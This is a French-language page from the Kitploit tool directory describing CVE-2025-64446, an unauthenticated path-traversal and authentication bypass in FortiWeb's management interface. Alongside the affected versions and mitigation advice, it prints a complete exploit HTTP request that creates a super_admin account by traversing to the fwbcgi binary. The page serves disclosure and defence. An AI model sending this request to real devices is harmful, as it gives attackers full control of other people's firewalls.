Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-64446 — CVE-2025-64446 | Kitploit
Outils/GitHubGitHub/0xblackash/cve-2025-64446
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHub0xblackash/cve-2025-64446

CVE-2025-64446

CVE-2025-64446

Voir le dépôt
4il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🛡️ CVE-2025-64446 - Contournement d'Authentification Critique et Traversée de Chemin sur FortiWeb

Linux 6 15 Released (18) (1)

Severity Fortinet Exploited

Vulnérabilité critique sans authentification permettant à un attaquant distant de créer des comptes administrateur sur les appareils FortiWeb.


📌 Aperçu

CVE-2025-64446 est une vulnérabilité grave de traversée de chemin relative dans l'interface de gestion du pare-feu d'applications web FortiWeb.

Un attaquant distant non authentifié peut exploiter cette faille pour contourner l'authentification et créer de nouveaux utilisateurs administrateur avec tous les privilèges, conduisant à une compromission totale de l'appareil.

  • Score CVSS v3.1 : 9.8 (Critique)
  • Type d'attaque : Distante non authentifiée
  • Impact : Prise de contrôle administrative complète
  • Statut : Exploité activement dans la nature

🛠️ Versions Concernées

Recommandation : Mettez à jour vers la version corrigée la plus récente dès que possible.


🔥 Comment les attaquants exploitent cette vulnérabilité

Exploitation étape par étape

  1. Identification de la cible
    L'attaquant scanne les interfaces de gestion FortiWeb exposées publiquement (généralement sur les ports HTTPS 443 ou 8443).

  2. Création de la requête malveillante
    Le cœur de l'exploit est une traversée de chemin relative (../) combinée à une URL spécialement conçue qui atteint un point d'accès CGI interne non authentifié.

    Modèle de point d'accès vulnérable :

    root@kitploit:~
    /api/v2.0/cmdb/system/admin?.../../../../../../cgi-bin/fwbcgi
    
  3. Envoi de l'exploit

    L'attaquant envoie une seule requête POST avec une charge utile JSON pour créer un nouveau compte administrateur.

    Exemple de requête d'exploit :

    root@kitploit:~
    POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
    Host: target-fortiweb.example.com
    Content-Type: application/json
    
    {
      "name": "hackedadmin",
      "password": "AttackerPass123!",
      "access_profile": "super_admin",
      "type": "local"
    }
    
  4. Exploitation réussie

    En cas de succès, FortiWeb crée le nouveau compte administrateur sans nécessiter d'authentification préalable. L'attaquant peut alors se connecter avec les identifiants nouvellement créés et prendre le contrôle total du WAF.

Pourquoi cela fonctionne

L'API de gestion ne nettoie pas correctement le chemin, permettant à la requête de traverser en arrière jusqu'au binaire fwbcgi hérité, qui n'impose pas d'authentification pour certaines opérations.


📸 Captures d'écran

Fortinet0day 3 Fortinet0day Fortinet0day 1 Fortinet0day 2

🛡️ Atténuation & Bonnes pratiques

  • Mettez immédiatement à niveau FortiWeb vers une version corrigée
  • N'exposez jamais l'interface de gestion directement sur Internet
  • Utilisez une segmentation réseau solide et un VPN pour l'accès administratif
  • Surveillez les journaux pour les requêtes contenant fwbcgi, ../ ou des tentatives inhabituelles de création d'administrateur
  • Auditez régulièrement les comptes administrateur pour détecter des entrées suspectes

À des fins éducatives et de recherche défensive en sécurité uniquement.

Fait avec ❤️ pour la communauté de la cybersécurité

Dernière mise à jour : avril 2026

Télécharger l’outil
ProduitVersions affectéesVersion corrigée
FortiWeb 8.08.0.0 – 8.0.18.0.2 et ultérieure
FortiWeb 7.67.6.0 – 7.6.47.6.5 et ultérieure
FortiWeb 7.47.4.0 – 7.4.97.4.10 et ultérieure
FortiWeb 7.27.2.0 – 7.2.117.2.12 et ultérieure
FortiWeb 7.07.0.0 – 7.0.117.0.12 et ultérieure